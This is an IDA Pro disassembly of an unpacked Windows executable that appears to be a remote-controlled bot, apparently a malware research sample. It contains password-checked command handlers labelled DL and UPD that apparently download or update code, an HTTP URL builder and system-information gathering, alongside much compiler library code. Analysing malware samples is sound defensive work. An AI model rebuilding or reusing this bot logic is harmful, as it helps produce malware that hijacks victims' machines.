;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 6D2F9CF6C59B4F0014C76F05EE34D272
; File Name : u:\work\6d2f9cf6c59b4f0014c76f05ee34d272_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001B53E ( 111934.)
; Section size in file : 0001B53E ( 111934.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; [0000001C BYTES: COLLAPSED FUNCTION std::char_traits<char>::_Copy_s(char *,uint,char const *,uint). PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION std::char_traits<char>::_Move_s(char *,uint,char const *,uint). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_401038 proc near ; DATA XREF: .rdata:004219C4�o
mov dword ptr [ecx], offset off_41D314
jmp sub_402CCA
sub_401038 endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_401043(void *Memory,char)
sub_401043 proc near ; DATA XREF: .rdata:off_41D314�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D314
call sub_402CCA
test [esp+4+arg_0], 1
jz short loc_40105F
push esi ; Memory
call j__free
pop ecx
loc_40105F: ; CODE XREF: sub_401043+13�j
mov eax, esi
pop esi
retn 4
sub_401043 endp
; =============== S U B R O U T I N E =======================================
sub_401065 proc near ; CODE XREF: sub_40121E+43�p
; sub_4016BA+43�p ...
push 4
mov eax, offset __ehhandler$?CallUnexpected@@YAXPBU_s_ESTypeList@@@Z_0
call __EH_prolog3
mov esi, ecx
mov [ebp-10h], esi
call sub_402BFB
and dword ptr [ebp-4], 0
push dword ptr [ebp+8]
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>> const &)
mov eax, esi
call __EH_epilog3
retn 4
sub_401065 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40109A proc near ; CODE XREF: sub_4010C5+3�p
; sub_4010E1+6�j ...
push esi
mov esi, ecx
push 0 ; MaxCount
push 1 ; char
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEX_NI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool,uint)
mov ecx, esi
pop esi
jmp sub_402CCA
sub_40109A endp
; [0000000E BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_4010C5(void *Memory,char)
sub_4010C5 proc near ; DATA XREF: .rdata:off_41D320�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_40109A
test [esp+4+arg_0], 1
jz short loc_4010DB
push esi ; Memory
call j__free
pop ecx
loc_4010DB: ; CODE XREF: sub_4010C5+D�j
mov eax, esi
pop esi
retn 4
sub_4010C5 endp
; =============== S U B R O U T I N E =======================================
sub_4010E1 proc near ; DATA XREF: .rdata:0042198C�o
mov dword ptr [ecx], offset off_41D32C
jmp sub_40109A
sub_4010E1 endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_4010EC(void *Memory,char)
sub_4010EC proc near ; DATA XREF: .rdata:off_41D32C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D32C
call sub_40109A
test [esp+4+arg_0], 1
jz short loc_401108
push esi ; Memory
call j__free
pop ecx
loc_401108: ; CODE XREF: sub_4010EC+13�j
mov eax, esi
pop esi
retn 4
sub_4010EC endp
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; [00000026 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>> const &). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_401137: ; CODE XREF: .text:0041C1CE�j
; .text:0041C24A�j ...
push 0
push 1
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEX_NI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool,uint)
retn
; [00000092 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint). PRESS KEYPAD "+" TO EXPAND]
; [0000004B BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool,uint). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40121E proc near ; CODE XREF: sub_41BB84+4A�p
push 44h
mov eax, offset loc_41C2BC
call __EH_prolog3
push dword ptr [ebp+10h]
mov esi, [ebp+0Ch]
push dword ptr [esi+4]
push esi
call sub_401395
mov ecx, 0FC0FC0h
sub ecx, dword_433C44
cmp ecx, 1
jnb short loc_40127B
push offset aListTTooLong ; "list<T> too long"
lea ecx, [ebp-28h]
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(char const *)
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push offset dword_421988
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D32C
call sub_4041BB
loc_40127B: ; CODE XREF: sub_40121E+29�j
inc dword_433C44
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call __EH_epilog3
retn 0Ch
sub_40121E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401291 proc near ; CODE XREF: sub_41C370�p
push 10Ch ; Size
call ??2@YAPAXI@Z ; operator new(uint)
test eax, eax
pop ecx
jz short loc_4012A2
mov [eax], eax
loc_4012A2: ; CODE XREF: sub_401291+D�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_4012AB
mov [ecx], eax
locret_4012AB: ; CODE XREF: sub_401291+16�j
retn
sub_401291 endp
; [0000006F BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::erase(uint,uint). PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Eos(uint). PRESS KEYPAD "+" TO EXPAND]
; [0000005E BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Grow(uint,bool). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_401395 proc near ; CODE XREF: sub_40121E+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 10Ch ; Size
call ??2@YAPAXI@Z ; operator new(uint)
test eax, eax
pop ecx
jz short loc_4013AA
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_4013AA: ; CODE XREF: sub_401395+D�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_4013B7
mov edx, [esp+arg_4]
mov [ecx], edx
loc_4013B7: ; CODE XREF: sub_401395+1A�j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_4013CA
push esi
mov esi, [esp+8+arg_8]
push 41h
pop ecx
rep movsd
pop esi
loc_4013CA: ; CODE XREF: sub_401395+28�j
pop edi
retn 0Ch
sub_401395 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D32C
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4013E6 proc near ; CODE XREF: .text:004013D5�p
; sub_4026B9+46�p
push 4
mov eax, offset __ehhandler$?CallUnexpected@@YAXPBU_s_ESTypeList@@@Z_0
call __EH_prolog3
mov esi, ecx
mov [ebp-10h], esi
mov edi, [ebp+8]
push edi
call ??0exception@std@@QAE@ABV01@@Z ; std::exception::exception(exception::exception const &)
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>> const &)
mov eax, esi
call __EH_epilog3
retn 4
sub_4013E6 endp ; sp-analysis failed
; [00000022 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(char const *). PRESS KEYPAD "+" TO EXPAND]
; [000000CD BYTES: COLLAPSED FUNCTION unknown_libname_2. PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION unknown_libname_5. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_401524 proc near ; CODE XREF: std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(char const *)+17�p
Src = dword ptr 4
mov eax, [esp+Src]
push esi
mov esi, ecx
lea edx, [eax+1]
loc_40152E: ; CODE XREF: sub_401524+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40152E
sub eax, edx
push eax ; MaxCount
push [esp+8+Src] ; Src
mov ecx, esi
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *,uint)
pop esi
retn 4
sub_401524 endp
; [00000072 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *,uint). PRESS KEYPAD "+" TO EXPAND]
; [00000034 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Inside(char const *). PRESS KEYPAD "+" TO EXPAND]
; [00000062 BYTES: COLLAPSED FUNCTION std::_Allocate<char>(uint,char *). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40164F proc near ; CODE XREF: sub_40243A+47�p
; sub_40243A:loc_4024A3�p ...
cmp dword ptr [esi], 0
jnz short loc_401659
call __invalid_parameter_noinfo
loc_401659: ; CODE XREF: sub_40164F+3�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_401668
call __invalid_parameter_noinfo
loc_401668: ; CODE XREF: sub_40164F+12�j
mov eax, [esi+4]
add eax, 8
retn
sub_40164F endp
; =============== S U B R O U T I N E =======================================
sub_40166F proc near ; CODE XREF: sub_40243A+39�p
; sub_413F8F+2F�p ...
mov eax, [esi]
test eax, eax
jz short loc_401679
cmp eax, [edi]
jz short loc_40167E
loc_401679: ; CODE XREF: sub_40166F+4�j
call __invalid_parameter_noinfo
loc_40167E: ; CODE XREF: sub_40166F+8�j
mov eax, [esi+4]
xor ecx, ecx
cmp eax, [edi+4]
setnz cl
mov al, cl
retn
sub_40166F endp
; =============== S U B R O U T I N E =======================================
sub_40168C proc near ; CODE XREF: sub_40243A+62�p
; sub_413F8F+47�p ...
cmp dword ptr [esi], 0
mov eax, [esi]
mov [edi], eax
mov eax, [esi+4]
mov [edi+4], eax
jnz short loc_4016A0
call __invalid_parameter_noinfo
loc_4016A0: ; CODE XREF: sub_40168C+D�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_4016AF
call __invalid_parameter_noinfo
loc_4016AF: ; CODE XREF: sub_40168C+1C�j
mov eax, [esi+4]
mov eax, [eax]
mov [esi+4], eax
mov eax, edi
retn
sub_40168C endp
; =============== S U B R O U T I N E =======================================
sub_4016BA proc near ; CODE XREF: sub_4140AB+54�p
push 48h
mov eax, offset loc_41C24F
call __EH_prolog3
push dword ptr [ebp+8]
mov esi, [ebp+10h]
push dword ptr [esi+4]
push esi
call sub_401745
mov ecx, 3C3C3C3h
sub ecx, dword_433C50
cmp ecx, 1
jnb short loc_401717
push offset aListTTooLong ; "list<T> too long"
lea ecx, [ebp-2Ch]
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(char const *)
and dword ptr [ebp-4], 0
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-54h]
call sub_401065
push offset dword_421988
lea eax, [ebp-54h]
push eax
mov dword ptr [ebp-54h], offset off_41D32C
call sub_4041BB
loc_401717: ; CODE XREF: sub_4016BA+29�j
inc dword_433C50
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call __EH_epilog3
retn 0Ch
sub_4016BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40172D proc near ; CODE XREF: sub_41C370:loc_41C38D�p
push 4Ch ; Size
call ??2@YAPAXI@Z ; operator new(uint)
test eax, eax
pop ecx
jz short loc_40173B
mov [eax], eax
loc_40173B: ; CODE XREF: sub_40172D+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_401744
mov [ecx], eax
locret_401744: ; CODE XREF: sub_40172D+13�j
retn
sub_40172D endp
; =============== S U B R O U T I N E =======================================
sub_401745 proc near ; CODE XREF: sub_4016BA+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 4Ch ; Size
call ??2@YAPAXI@Z ; operator new(uint)
test eax, eax
pop ecx
jz short loc_401757
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_401757: ; CODE XREF: sub_401745+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_401764
mov edx, [esp+arg_4]
mov [ecx], edx
loc_401764: ; CODE XREF: sub_401745+17�j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_401777
push esi
mov esi, [esp+8+arg_8]
push 11h
pop ecx
rep movsd
pop esi
loc_401777: ; CODE XREF: sub_401745+25�j
pop edi
retn 0Ch
sub_401745 endp
; =============== S U B R O U T I N E =======================================
sub_40177B proc near ; DATA XREF: .rdata:off_420AE4�o
push 4B8h
mov eax, offset loc_41C348
call __EH_prolog3_GS
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4BCh], eax
mov [ebp-4C0h], edi
jl loc_4019D5
mov esi, 0BFh
xor ebx, ebx
push esi ; size_t
lea eax, [ebp-18Fh]
push ebx ; int
push eax ; void *
mov [ebp-190h], bl
call _memset
push esi ; size_t
lea eax, [ebp-0CFh]
push ebx ; int
push eax ; void *
mov [ebp-0D0h], bl
call _memset
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41B7F9
push 0C0h
lea esi, [ebp-0D0h]
mov ebx, offset aGdbdADjmGjZJJN ; "У¤¡¤ÓÑ ×ÐÓ¤¦¬Ñ£¦Ó§Ô¦Ð¦ÐÑÑÐÑÖÐÑ ÐѦ§£"...
call sub_4196D1
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401817
cmp byte_425222, 0
jz loc_4019EB
loc_401817: ; CODE XREF: sub_40177B+8D�j
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401823: ; CODE XREF: sub_40177B+C0�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401841
test dl, dl
jz short loc_40183D
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401841
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401823
loc_40183D: ; CODE XREF: sub_40177B+B0�j
xor eax, eax
jmp short loc_401846
; ---------------------------------------------------------------------------
loc_401841: ; CODE XREF: sub_40177B+AC�j
; sub_40177B+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401846: ; CODE XREF: sub_40177B+C4�j
test eax, eax
jnz loc_4019C8
push 327h ; size_t
push eax ; int
lea eax, [ebp-4B8h]
push eax ; void *
call _memset
push dword ptr [ebp-4BCh]
mov esi, offset aS_19 ; "%s"
push esi ; Format
mov edi, 0FFh
lea eax, [ebp-4B8h]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_40188A: ; CODE XREF: sub_40177B+114�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40188A
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi ; Format
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_4018BB: ; CODE XREF: sub_40177B+145�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018BB
mov ebx, [ebp-4C0h]
push dword ptr [ebx+8]
sub eax, ecx
push esi ; Format
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_4018EE: ; CODE XREF: sub_40177B+178�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018EE
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi ; Format
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp-295h]
add esp, 10h
lea esi, [eax+1]
loc_40191B: ; CODE XREF: sub_40177B+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40191B
sub eax, esi
mov [ebp+eax-295h], cl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 4
mov [ebp-193h], al
pop eax
cmp [ebp+1Ch], eax
jl short loc_40198B
mov [ebp-4BCh], eax
loc_40194B: ; CODE XREF: sub_40177B+203�j
mov eax, [ebx+eax*4]
push 3
mov edi, offset aE ; "-e"
mov esi, eax
pop ecx
xor edx, edx
repe cmpsb
jz short loc_401982
mov esi, eax
push 2
mov edi, offset a1_0 ; "1"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_401982
mov eax, [ebp-4BCh]
inc eax
cmp eax, [ebp+1Ch]
mov [ebp-4BCh], eax
jle short loc_40194B
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_401982: ; CODE XREF: sub_40177B+1E1�j
; sub_40177B+1F1�j
mov byte ptr [ebp-195h], 1
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_40198B: ; CODE XREF: sub_40177B+1C8�j
mov byte ptr [ebp-195h], 0
loc_401992: ; CODE XREF: sub_40177B+205�j
; sub_40177B+20E�j
push 8 ; Size
mov byte ptr [ebp-194h], 0
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov [ebp-4C0h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_4019EB
push offset sub_41B925
lea ecx, [ebp-4B8h]
mov edi, offset aDl_0 ; "DL"
mov esi, eax
call sub_4140AB
jmp short loc_4019EB
; ---------------------------------------------------------------------------
loc_4019C8: ; CODE XREF: sub_40177B+CD�j
push offset aDlAuthFailure_ ; "DL: Auth Failure."
push dword ptr [ebp-4BCh]
jmp short loc_4019DB
; ---------------------------------------------------------------------------
loc_4019D5: ; CODE XREF: sub_40177B+2E�j
push offset aDlInvalidArgum ; "DL: Invalid Arguments"
push eax ; int
loc_4019DB: ; CODE XREF: sub_40177B+258�j
push dword ptr [ebp+0Ch] ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 10h
loc_4019EB: ; CODE XREF: sub_40177B+96�j
; sub_40177B+232�j ...
call sub_40467F
retn 1Ch
sub_40177B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4019F3 proc near ; DATA XREF: .rdata:off_420AEC�o
push 4B8h
mov eax, offset loc_41C313
call __EH_prolog3_GS
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4C0h], eax
mov [ebp-4BCh], edi
jl loc_401BFF
mov esi, 0BFh
xor ebx, ebx
push esi ; size_t
lea eax, [ebp-18Fh]
push ebx ; int
push eax ; void *
mov [ebp-190h], bl
call _memset
push esi ; size_t
lea eax, [ebp-0CFh]
push ebx ; int
push eax ; void *
mov [ebp-0D0h], bl
call _memset
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41B7F9
push 0C0h
lea esi, [ebp-0D0h]
mov ebx, offset aNbEdGzDdnbgNdZ ; "¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ"...
call sub_4196D1
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401A8F
cmp byte_425222, 0
jz loc_401C15
loc_401A8F: ; CODE XREF: sub_4019F3+8D�j
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401A9B: ; CODE XREF: sub_4019F3+C0�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401AB9
test dl, dl
jz short loc_401AB5
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401AB9
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401A9B
loc_401AB5: ; CODE XREF: sub_4019F3+B0�j
xor eax, eax
jmp short loc_401ABE
; ---------------------------------------------------------------------------
loc_401AB9: ; CODE XREF: sub_4019F3+AC�j
; sub_4019F3+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401ABE: ; CODE XREF: sub_4019F3+C4�j
test eax, eax
jnz loc_401BF2
push 327h ; size_t
push eax ; int
lea eax, [ebp-4B8h]
push eax ; void *
call _memset
push dword ptr [ebp-4C0h]
mov esi, offset aS_19 ; "%s"
push esi ; Format
mov edi, 0FFh
lea eax, [ebp-4B8h]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_401B02: ; CODE XREF: sub_4019F3+114�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B02
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi ; Format
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_401B33: ; CODE XREF: sub_4019F3+145�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B33
mov ebx, [ebp-4BCh]
push dword ptr [ebx+8]
sub eax, ecx
push esi ; Format
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_401B66: ; CODE XREF: sub_4019F3+178�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B66
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi ; Format
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp-295h]
add esp, 10h
lea ecx, [eax+1]
loc_401B93: ; CODE XREF: sub_4019F3+1A5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B93
sub eax, ecx
mov [ebp+eax-295h], dl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 8 ; Size
mov [ebp-193h], al
mov byte ptr [ebp-195h], 1
mov byte ptr [ebp-194h], 1
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov [ebp-4BCh], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_401C15
push offset sub_41B925
lea ecx, [ebp-4B8h]
mov edi, offset aDl_0 ; "DL"
mov esi, eax
call sub_4140AB
jmp short loc_401C15
; ---------------------------------------------------------------------------
loc_401BF2: ; CODE XREF: sub_4019F3+CD�j
push offset aUpdAuthFailure ; "UPD: Auth Failure."
push dword ptr [ebp-4C0h]
jmp short loc_401C05
; ---------------------------------------------------------------------------
loc_401BFF: ; CODE XREF: sub_4019F3+2E�j
push offset aUpdInvalidArgu ; "UPD: Invalid Arguments."
push eax ; int
loc_401C05: ; CODE XREF: sub_4019F3+20A�j
push dword ptr [ebp+0Ch] ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 10h
loc_401C15: ; CODE XREF: sub_4019F3+96�j
; sub_4019F3+1E4�j ...
call sub_40467F
retn 1Ch
sub_4019F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C1D proc near ; DATA XREF: .rdata:off_420B04�o
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
Args = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 118h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_10]
push ebx
mov [ebp+var_118], eax
push esi
push edi
xor eax, eax
xor ecx, ecx
mov [ebp+Args], cl
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
push 0FFh ; size_t
stosb
push ecx ; int
lea eax, [ebp+var_113]
push eax ; void *
mov [ebp+var_114], cl
call _memset
push dword_4269BC
lea esi, [ebp+Args]
call sub_418FC6
push 100h
lea esi, [ebp+var_114]
mov ebx, offset byte_425061
call sub_4196D1
mov eax, esi
push eax
push dword_426594
lea eax, [ebp+Args]
push eax ; Args
push offset aHttpSDS ; "http://%s:%d/%s"
push [ebp+var_118] ; int
push dword ptr [ebp+arg_4] ; char
push offset dword_4269BC ; int
call sub_417361
mov ecx, [ebp+var_4]
add esp, 30h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 1Ch
sub_401C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401CC0 proc near ; DATA XREF: .rdata:off_420BC4�o
var_444 = byte ptr -444h
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = byte ptr -438h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_418 = byte ptr -418h
var_417 = byte ptr -417h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
Args = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 444h
mov eax, dword_423064
xor eax, esp
mov [esp+444h+var_4], eax
mov eax, [ebp+arg_10]
push ebx
push esi
push edi
mov esi, 0FFh
push esi ; size_t
mov [esp+454h+var_43C], eax
xor ebx, ebx
lea eax, [esp+454h+var_107]
push ebx ; int
push eax ; void *
mov [esp+45Ch+Args], 0
call _memset
add esp, 0Ch
push esi ; size_t
lea eax, [esp+454h+var_307]
push ebx ; int
push eax ; void *
mov [esp+45Ch+var_308], bl
call _memset
xor eax, eax
mov [esp+45Ch+var_418], bl
lea edi, [esp+45Ch+var_417]
stosd
stosd
stosd
stosw
add esp, 0Ch
push esi ; size_t
stosb
lea eax, [esp+454h+var_407]
push ebx ; int
push eax ; void *
mov [esp+45Ch+var_408], bl
call _memset
add esp, 0Ch
push esi ; size_t
lea eax, [esp+454h+var_207]
push ebx ; int
push eax ; void *
mov [esp+45Ch+var_208], bl
call _memset
add esp, 0Ch
push 8
pop ecx
xor eax, eax
lea edi, [esp+450h+var_438]
rep stosd
lea eax, [esp+450h+var_438]
mov ebx, 100h
push eax
mov [esp+454h+var_440], ebx
call ds:dword_41D098 ; GlobalMemoryStatus
mov edi, [esp+450h+var_430]
mov ecx, [esp+450h+var_42C]
shr edi, 14h
shr ecx, 14h
mov eax, edi
sub eax, ecx
push 1
mov ecx, ebx ; unsigned int
lea esi, [esp+454h+Args]
mov dword ptr [esp+454h+var_444], eax
call sub_418E51
pop ecx
call sub_41A391
push 1
push ebx
lea esi, [esp+458h+var_308]
call sub_418E1F
push dword_4269BC
lea esi, [esp+45Ch+var_418]
call sub_418FC6
add esp, 0Ch
lea eax, [esp+450h+var_440]
push eax
lea eax, [esp+454h+var_408]
